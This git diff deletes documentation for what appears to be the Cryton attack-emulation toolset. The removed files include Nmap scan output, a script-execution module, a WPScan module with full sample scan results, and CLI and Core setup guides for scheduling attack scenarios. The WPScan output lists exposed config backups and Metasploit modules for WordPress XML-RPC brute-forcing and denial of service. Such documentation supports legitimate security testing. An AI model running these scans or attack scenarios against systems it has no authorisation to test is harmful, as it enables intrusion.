key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPkR0kyR7nNOBkue6qsy995GPdpnlnrsbDMkm/8lrx8dTkg+xg5exjZcQeATsNgMbzvwAcm4NXEMg3RNiLAJ4Zo=</elem>\n<elem key="bits">256</elem>\n</table>\n<table>\n<elem key="fingerprint">6136ed35894508e085da45059f70ed15</elem>\n<elem key="type">ssh-ed25519</elem>\n<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIJIkt1AlQN1PvvvgH6AgQjroOF2iIYTC0QFqP0Kfx9bC</elem>\n<elem key="bits">256</elem>\n</table>\n</script></port>\n<port protocol="tcp" portid="111"><state state="open" 
reason="syn-ack" reason_ttl="0"/><service name="rpcbind" version="2-4" extrainfo="RPC #100000" method="probed" conf="10"/><script id="rpcinfo" output="
 program version port/proto service
 100000 2,3,4 111/tcp rpcbind
 100000 2,3,4 111/udp rpcbind
 100000 3,4 111/tcp6 rpcbind
 100000 3,4 111/udp6 rpcbind
 100024 1 34829/tcp status
 100024 1 35465/udp status
 100024 1 38358/udp6 status
 100024 1 41647/tcp6 status
"><table key="100024">\n<table key="tcp6">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">41647</elem>\n<elem key="owner">107</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="udp">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">35465</elem>\n<elem key="owner">107</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n<table key="udp6">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">38358</elem>\n<elem key="owner">107</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="tcp">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">34829</elem>\n<elem key="owner">107</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n</table>\n<table key="100000">\n<table key="udp">\n<table key="version">\n<elem>2</elem>\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n<table key="local">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="addr">/run/rpcbind.sock</elem>\n<elem key="owner">superuser</elem>\n</table>\n<table key="tcp6">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="udp6">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="tcp">\n<table key="version">\n<elem>2</elem>\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n</table>\n</script></port>\n</ports>\n<times srtt="484" rttvar="383" to="100000"/>\n</host>\n<runstats><finished time="1660741360" timestr="Wed Aug 17 15:02:40 2022" summary="Nmap done at Wed Aug 17 15:02:40 2022; 1 IP address (1 host up) scanned in 7.65 seconds" elapsed="7.65" 
exit="success"/><hosts up="1" down="0" total="1"/>\n</runstats>\n</nmaprun>' -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_script.md b/docs/2022.2/modules/mod_script.md deleted file mode 100644 index 5c4f4bc3ef98883417aa229ae40bff0f33739f11..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_script.md +++ /dev/null @@ -1,49 +0,0 @@ -# mod_script - -Module for running custom scripts. - -## System requirements - -There are no system requirements. - -## Input parameters - -Description of input parameters for module. - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|----------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `script_path` | Yes | /tmp/script.py | string | - | Full path to the script. | -| `script_arguments` | No | -arg1 example | string | - | Optional arguments for script. | -| `executable` | Yes | python3 | string | - | What should be used to execute the script | -| `serialized_output` | No | true | string | false | Flag whether you want to return the result of the script in `serialized_output`, so that it could be used as input in other modules. **NOTICE: output of the script muse be valid JSON with this option enabled.** | -| `timeout` | No | 60 | int | - | For how long - in seconds - the script should run (overrides args), if not set, module waits until the script finishes. | - -### Example yaml(s) - -```yaml -module_arguments: - script_path: /tmp/example.py - script_arguments: -t 10.10.10.5 - executable: python3 - timeout: 30 -``` - -## Output - -Description of output. 
- -| Parameter name | Parameter description | -|---------------------|---------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from the script or any errors that can occur during module execution | -| `serialized_output` | Serialized script output in JSON that can accessed in other modules as input | - -### Example - -```json lines -{ - "serialized_output": None, - "output": "script output", - "return_code": 0 -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_wpscan.md b/docs/2022.2/modules/mod_wpscan.md deleted file mode 100644 index 3cd29affac4c7fd30065a4eaaf564ea75e7cb10b..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_wpscan.md +++ /dev/null @@ -1,73 +0,0 @@ -# mod_wpscan - -This module runs WPScan on given target and returns a file with found vulnerabilities. - -## System requirements - -For this module to function properly, [WPScan](https://www.kali.org/tools/wpscan/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|---------------------------------|-----------|---------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | Yes | http://127.0.0.1:8000/index.php | string | - | Scan target. | -| `api_token` | No | TOKEN | string | - | The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile. | -| `options` | No | --max-threads 7 | string | - | Additional WPScan parameters. 
| -| `serialized_output` | No | False | bool | True | Flag for returning json serialized result in `serialized_output`, so that it could be used as input in other modules. **NOTICE: uses `-f json` as a parameter in WPScan command.** | | | | - - -### Parameters with custom nmap command -**NOTICE: For the scan result to be in the `serialized_output`, use `-f json` parameter in the WPScan command** - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|------------------|----------|------------------------------------------------------|-----------|---------------|-----------------------------------| -| `custom_command` | Yes | wpscan --url http://127.0.0.1:8000/index.php -f json | string | - | WPScan command as in command line | - - -## Output parameters - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output of WPScan or any errors that can occur during module execution. | -| `serialized_output` | Serialized WPScan output in JSON that can accessed in other modules as input. 
| - - -## Example yaml(s) with module results - -### Example with serialized output -```yaml -module_arguments: - target: CHANGE_ME - options: --max-threads 7 -``` - -```json lines -{ - 'return_code': 0, - 'output': '', - 'serialized_output': {'banner': {'description': 'WordPress Security Scanner by the WPScan Team', 'version': '3.8.22', 'authors': ['@_WPScan_', '@ethicalhack3r', '@erwan_lr', '@firefart'], 'sponsor': 'Sponsored by Automattic - https://automattic.com/'}, 'start_time': 1667510731, 'start_memory': 50909184, 'target_url': 'http://127.12.0.1/', 'target_ip': '127.12.0.1', 'effective_url': 'http://127.12.0.1/', 'interesting_findings': [{'url': 'http://127.12.0.1/', 'to_s': 'Headers', 'type': 'headers', 'found_by': 'Headers (Passive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': ['Server: Apache/2.4.7 (Ubuntu)', 'X-Powered-By: PHP/5.5.9-1ubuntu4.29', 'SecretHeader: SecretValue', 'via: Squid 1.0.0']}, {'url': 'http://127.12.0.1/robots.txt', 'to_s': 'robots.txt found: http://127.12.0.1/robots.txt', 'type': 'robots_txt', 'found_by': 'Robots Txt (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/searchreplacedb2.php', 'to_s': 'Search Replace DB script found: http://127.12.0.1/searchreplacedb2.php', 'type': 'search_replace_db2', 'found_by': 'Search Replace Db2 (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {'url': ['https://interconnectit.com/products/search-and-replace-for-wordpress-databases/']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/xmlrpc.php', 'to_s': 'XML-RPC seems to be enabled: http://127.12.0.1/xmlrpc.php', 'type': 'xmlrpc', 'found_by': 'Headers (Passive Detection)', 'confidence': 100, 'confirmed_by': {'Link Tag (Passive Detection)': {'confidence': 30}, 'Direct Access (Aggressive Detection)': {'confidence': 100}}, 'references': {'url': 
['http://codex.wordpress.org/XML-RPC_Pingback_API'], 'metasploit': ['auxiliary/scanner/http/wordpress_ghost_scanner', 'auxiliary/dos/http/wordpress_xmlrpc_dos', 'auxiliary/scanner/http/wordpress_xmlrpc_login', 'auxiliary/scanner/http/wordpress_pingback_access']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/readme.html', 'to_s': 'WordPress readme found: http://127.12.0.1/readme.html', 'type': 'readme', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/wp-content/debug.log', 'to_s': 'Debug Log found: http://127.12.0.1/wp-content/debug.log', 'type': 'debug_log', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {'url': ['https://codex.wordpress.org/Debugging_in_WordPress']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/wp-cron.php', 'to_s': 'The external WP-Cron seems to be enabled: http://127.12.0.1/wp-cron.php', 'type': 'wp_cron', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 60, 'confirmed_by': {}, 'references': {'url': ['https://www.iplocation.net/defend-wordpress-from-ddos', 'https://github.com/wpscanteam/wpscan/issues/1299']}, 'interesting_entries': []}], 'version': {'number': '4.2.34', 'release_date': '0001-01-01', 'status': 'outdated', 'found_by': 'Rss Generator (Passive Detection)', 'confidence': 100, 'interesting_entries': ['http://127.12.0.1/index.php/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>', 'http://127.12.0.1/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>'], 'confirmed_by': {}, 'vulnerabilities': []}, 'main_theme': {'slug': 'twentyfifteen', 'location': 'http://127.12.0.1/wp-content/themes/twentyfifteen/', 'latest_version': '3.3', 'last_updated': '2022-11-02T00:00:00.000Z', 'outdated': True, 'readme_url': 'http://127.12.0.1/wp-content/themes/twentyfifteen/readme.txt', 'directory_listing': False, 
'error_log_url': None, 'style_url': 'http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34', 'style_name': 'Twenty Fifteen', 'style_uri': 'https://wordpress.org/themes/twentyfifteen/', 'description': "Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.", 'author': 'the WordPress team', 'author_uri': 'https://wordpress.org/', 'template': None, 'license': 'GNU General Public License v2 or later', 'license_uri': 'http://www.gnu.org/licenses/gpl-2.0.html', 'tags': 'black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready', 'text_domain': 'twentyfifteen', 'found_by': 'Css Style In Homepage (Passive Detection)', 'confidence': 70, 'interesting_entries': [], 'confirmed_by': {}, 'vulnerabilities': [], 'version': {'number': '1.1', 'confidence': 80, 'found_by': 'Style (Passive Detection)', 'interesting_entries': ["http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34, Match: 'Version: 1.1'"], 'confirmed_by': {}}, 'parents': []}, 'plugins': {}, 'config_backups': {'http://127.12.0.1/wp-config.old': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.php.save': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.php~': {'found_by': 'Direct Access 
(Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.txt': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}}, 'vuln_api': {'error': 'No WPScan API Token given, as a result vulnerability data has not been output.\nYou can get a free API token with 25 daily requests by registering at https://wpscan.com/register'}, 'stop_time': 1667510735, 'elapsed': 4, 'requests_done': 139, 'cached_requests': 44, 'data_sent': 34812, 'data_sent_humanised': '33.996 KB', 'data_received': 20794, 'data_received_humanised': '20.307 KB', 'used_memory': 244031488, 'used_memory_humanised': '232.727 MB'} -} -``` - -### Example with text output -```yaml -module_arguments: - target: CHANGE_ME - options: --max-threads 7 - serialized_output: False -``` - -```json lines -{ - 'return_code': 0, - 'output': "_______________________________________________________________\n __ _______ _____\n \\ \\ / / __ \\ / ____|\n \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®\n \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\\n \\ /\\ / | | ____) | (__| (_| | | | |\n \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.17\n Sponsored by Automattic - https://automattic.com/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n\x1b[32m[+]\x1b[0m URL: http://127.12.0.1/ [127.12.0.1]\n\x1b[32m[+]\x1b[0m Started: Mon Nov 7 15:56:24 2022\n\nInteresting Finding(s):\n\n\x1b[32m[+]\x1b[0m Headers\n | Interesting Entries:\n | - Server: Apache/2.4.7 (Ubuntu)\n | - X-Powered-By: PHP/5.5.9-1ubuntu4.29\n | - SecretHeader: SecretValue\n | - via: Squid 1.0.0\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m robots.txt found: http://127.12.0.1/robots.txt\n | Found By: Robots Txt (Aggressive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m Search 
Replace DB script found: http://127.12.0.1/searchreplacedb2.php\n | Found By: Search Replace Db2 (Aggressive Detection)\n | Confidence: 100%\n | Reference: https://interconnectit.com/products/search-and-replace-for-wordpress-databases/\n\n\x1b[32m[+]\x1b[0m XML-RPC seems to be enabled: http://127.12.0.1/xmlrpc.php\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n | Confirmed By:\n | - Link Tag (Passive Detection), 30% confidence\n | - Direct Access (Aggressive Detection), 100% confidence\n | References:\n | - http://codex.wordpress.org/XML-RPC_Pingback_API\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/\n | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/\n\n\x1b[32m[+]\x1b[0m WordPress readme found: http://127.12.0.1/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m Debug Log found: http://127.12.0.1/wp-content/debug.log\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | Reference: https://codex.wordpress.org/Debugging_in_WordPress\n\n\x1b[32m[+]\x1b[0m The external WP-Cron seems to be enabled: http://127.12.0.1/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https://www.iplocation.net/defend-wordpress-from-ddos\n | - https://github.com/wpscanteam/wpscan/issues/1299\n\n\x1b[32m[+]\x1b[0m WordPress version 4.2.34 identified (Outdated, released on 0001-01-01).\n | Found By: Rss Generator (Passive Detection)\n | - http://127.12.0.1/index.php/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>\n | - http://127.12.0.1/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>\n\n\x1b[32m[+]\x1b[0m WordPress theme in use: twentyfifteen\n | 
Location: http://127.12.0.1/wp-content/themes/twentyfifteen/\n | Last Updated: 2022-11-02T00:00:00.000Z\n | Readme: http://127.12.0.1/wp-content/themes/twentyfifteen/readme.txt\n | \x1b[33m[!]\x1b[0m The version is out of date, the latest version is 3.3\n | Style URL: http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34\n | Style Name: Twenty Fifteen\n | Style URI: https://wordpress.org/themes/twentyfifteen/\n | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...\n | Author: the WordPress team\n | Author URI: https://wordpress.org/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34, Match: 'Version: 1.1'\n\n\x1b[32m[+]\x1b[0m Enumerating All Plugins (via Passive Methods)\n\n\x1b[34m[i]\x1b[0m No plugins Found.\n\n\x1b[32m[+]\x1b[0m Enumerating Config Backups (via Passive and Aggressive Methods)\n\n Checking Config Backups -: |==================================================|\n\n\x1b[34m[i]\x1b[0m Config Backup(s) Identified:\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.old\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.php.save\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.php~\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.txt\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[33m[!]\x1b[0m No WPScan API Token given, as a result vulnerability data has not been output.\n\x1b[33m[!]\x1b[0m You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n\n\x1b[32m[+]\x1b[0m Finished: Mon Nov 7 15:56:34 2022\n\x1b[32m[+]\x1b[0m Requests Done: 139\n\x1b[32m[+]\x1b[0m Cached Requests: 44\n\x1b[32m[+]\x1b[0m Data Sent: 
34.132 KB\n\x1b[32m[+]\x1b[0m Data Received: 20.307 KB\n\x1b[32m[+]\x1b[0m Memory used: 243.156 MB\n\x1b[32m[+]\x1b[0m Elapsed time: 00:00:10\n", - 'serialized_output': {} -} -``` diff --git a/docs/2022.2/starting-point/cli.md b/docs/2022.2/starting-point/cli.md deleted file mode 100644 index 4daf0e0e1a2b10ae25d2c84e2b9fce1c82ec2d0e..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/cli.md +++ /dev/null @@ -1,262 +0,0 @@ -## Description -Cryton CLI is a command line interface used to interact with [Cryton Core](core.md) (its API). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -and **[Cryton Worker](worker.md)** tools. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-cli). - -## Settings -Cryton CLI uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|---------------------------|---------|----------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_CLI_TIME_ZONE | string | AUTO | What [timezone](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) to use for scheduling (for example when scheduling a Run). <br> Use the `AUTO` value to use your system timezone. | -| CRYTON_CLI_API_HOST | string | 127.0.0.1 | Cryton Core's API address. | -| CRYTON_CLI_API_PORT | int | 8000 | Cryton Core's API port. | -| CRYTON_CLI_API_SSL | boolean | false | Use SSL to connect to REST API. | -| CRYTON_CLI_API_ROOT | string | api/ | REST API URL. 
**(do not change, if you don't know what you're doing)** | -| CRYTON_CLI_APP_DIRECTORY | string | ~/.local/cryton-cli/ | Path to the Cryton CLI directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-cli/ -``` - -Next, we download example settings (**change the version to match the app version**): -```shell -curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/<version>/.env -``` - -Update these settings to your needs. - -### Overriding the settings -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_CLI_API_HOST=127.0.0.1 -``` - -Some environment variables can be overridden in CLI. Try using `cryton-cli --help`. - -## Installation -Cryton CLI is available in the [PyPI](https://pypi.org/project/cryton-cli/) and can be installed using *pip* (`pip install --user cryton-cli`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). - -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-cli -``` - -Make sure you've correctly set the [settings](#settings). - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set, check out the [usage section](#usage). - -## Development -To install Cryton CLI for development, you must install [Poetry](https://python-poetry.org/docs/). 
- -Clone the repository: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-cli.git -``` - -Then go to the correct directory and install the project: -```shell -cd cryton-cli -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - -Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set. Check out the [usage section](#usage). - -## Usage -Use the following to invoke the app: -```shell -cryton-cli -``` - -You should see a help page: -``` -Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... - - A CLI wrapper for Cryton API. - -Options: - ... -``` - -**Please keep in mind that the [Cryton Core](core.md) -must be running and its API must be reachable.** - -To change the default API host/port use *-H* and *-p* options (to change them permanently, see the [settings section](#settings)). -```shell -cryton-cli -H 127.0.0.1 -p 8000 <your command> -``` - -**To learn about each command's options use**: -```shell -cryton-cli <your command> --help -``` - -For a better understanding of the results, we highlight the successful ones with **green** and the others with **red** color. - -### Example -#### 1. Create plan template -Create a plan template using a file containing the desired plan YAML. -```shell -cryton-cli plan-templates create my-plan.yml -``` - -Desired output: -``` -Template successfully created! (<response detail>). -``` - -#### 2. Create Plan instance -Create a Plan instance with the saved plan template. -```shell -cryton-cli plans create 1 -``` - -Create a Plan instance using the template and an inventory file. -```shell -cryton-cli plans create 1 -i inventory_file -``` - -Desired output: -``` -Plan successfully created! (<response detail>). -``` - -#### 3. 
Create Worker -To execute Plans (Runs) we have to define a Worker(s). -```shell -cryton-cli workers create customName -d "This is my first Worker!" -``` - -Desired output: -``` -Worker successfully created! (<response detail>). -``` - -#### 4. Create Run -Create a Run by choosing a Plan instance and providing a list of Workers for execution. -```shell -cryton-cli runs create 1 1 -``` - -Desired output: -``` -Run successfully created! (<response detail>). -``` - -#### 5. Schedule or execute Run -You can either schedule the Run for a specific date/time or execute it directly. Run will then be executed on every Worker -simultaneously. - -**Execute Run** -```shell -cryton-cli runs execute 1 -``` - -Desired output: -``` -Run successfully executed! (Run 1 was executed.). -``` - -**Schedule Run** -You can schedule a Run using the local timezone. -```shell -cryton-cli runs schedule 1 2020-06-08 10:00:00 -``` - -Desired output: -``` -Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.). -``` - -Or you can schedule it using UTC timezone with the flag `--utc-timezone`. Otherwise, your preset timezone is used. - -#### 6. Read Run report -A report can be generated anytime during the execution (also compliant with YAML format). It contains a list of -Stages/Steps and their results. -```shell -cryton-cli runs report 1 -``` - -Desired output: -``` -Successfully created Run's report! (file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) -``` - -Timestamps are displayed in UTC timezone by default. Use the `--localize` flag to display them using your preset timezone. - -## Shell completion -Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled (**the tool must be installed first**). 
- -### Bash -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-cli/ -``` - -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=bash_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.bash -``` - -Source the file in the `~/.bashrc` file: -```shell -echo ". ~/.local/cryton-cli/cryton-cli-complete.bash" >> ~/.bashrc -``` - -You may need to restart your shell for the changes to take effect. - -### Zsh -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-cli/ -``` - -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=zsh_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.zsh -``` - -Source the file in the `~/.zshrc` file: -```shell -echo ". ~/.local/cryton-cli/cryton-cli-complete.zsh" >> ~/.zshrc -``` - -You may need to restart your shell for the changes to take effect. - -### Fish -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=fish_source cryton-cli > ~/.config/fish/completions/cryton-cli-complete.fish -``` - -You may need to restart your shell for the changes to take effect. diff --git a/docs/2022.2/starting-point/core.md b/docs/2022.2/starting-point/core.md deleted file mode 100644 index ffbcd58a1fd983beb9bd1f3a776c54a8640ac7fb..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/core.md +++ /dev/null @@ -1,355 +0,0 @@ -## Description -Cryton Core is the center point of the Cryton toolset. It is used for: -- Creating, planning, and scheduling attack scenarios. -- Generating reports from attack scenarios. -- Controlling Workers and scenarios execution. - -To be able to execute the attack scenarios, you -also need to install the **[Cryton Worker](worker.md)** -and **[Cryton CLI](cli.md)** package. Optionally you can install -[Cryton Frontend](frontend.md) for non-command line experience. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. 
Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-core). - -## Settings -Cryton Core uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|-------------------------------------------|------------------------------------|------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_CORE_RABBIT_HOST | string | 127.0.0.1 | RabbitMQ server host. | -| CRYTON_CORE_RABBIT_PORT | int | 5672 | RabbitMQ server port. | -| CRYTON_CORE_RABBIT_USERNAME | string | admin | Username for RabbitMQ server login. | -| CRYTON_CORE_RABBIT_PASSWORD | string | mypass | Password for RabbitMQ server login. | -| CRYTON_CORE_DB_HOST | string | 127.0.0.1 | Postgres server host. | -| CRYTON_CORE_DB_PORT | int | 5432 | Postgres server port. | -| CRYTON_CORE_DB_NAME | string | cryton | Used Postgres database name. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DB_USERNAME | string | cryton | Username for Postgres server login. | -| CRYTON_CORE_DB_PASSWORD | string | cryton | Password for Postgres server login. | -| CRYTON_CORE_Q_ATTACK_RESPONSE | string | cryton_core.attack.response | Queue name for processing attack responses. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_AGENT_RESPONSE | string | cryton_core.agent.response | Queue name for processing agent responses. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_EVENT_RESPONSE | string | cryton_core.event.response | Queue name for processing event responses. 
**(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_CONTROL_REQUEST | string | cryton_core.control.request | Queue name for processing control requests. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DEBUG | boolean | false | Make Core run with debug output. | -| CRYTON_CORE_TZ | string | UTC | Internally used timezone. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DEFAULT_RPC_TIMEOUT | int | 120 | Timeout (in seconds) for RabbitMQ RPC requests. | -| CRYTON_CORE_API_SECRET_KEY | string | XF37..56 chars..6HB3 | Key (64 chars) used by REST API for cryptographic signing. More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#secret-key). | -| CRYTON_CORE_API_PUBLIC_PORT | int | 8000 | Port on which the Apache reverse proxy will be served (this only affects the *cryton_apache* Compose configuration). | -| CRYTON_CORE_API_ALLOWED_HOSTS | list of strings separated by space | * | Domain names that the site can serve. **(do not change, if you don't know what you're doing)** <br> More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#allowed-hosts). | -| CRYTON_CORE_API_STATIC_ROOT | string | /var/www/example.com/static/ | Directory for storing static files. **(do not change, if you don't know what you're doing)** <br> More information can be found [here](https://docs.djangoproject.com/en/4.0/ref/settings/#static-root). | -| CRYTON_CORE_API_USE_STATIC_FILES | boolean | true | Whether to serve static files or not. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_CPU_CORES | int | 3 | The maximum number of CPU cores (processes) Cryton Core can utilize. **(do not change/set/export, if you don't know what you're doing)** <br> This affects the speed of starting/consuming Steps/Rabbit requests. Set value to `auto` for the best CPU utilization. 
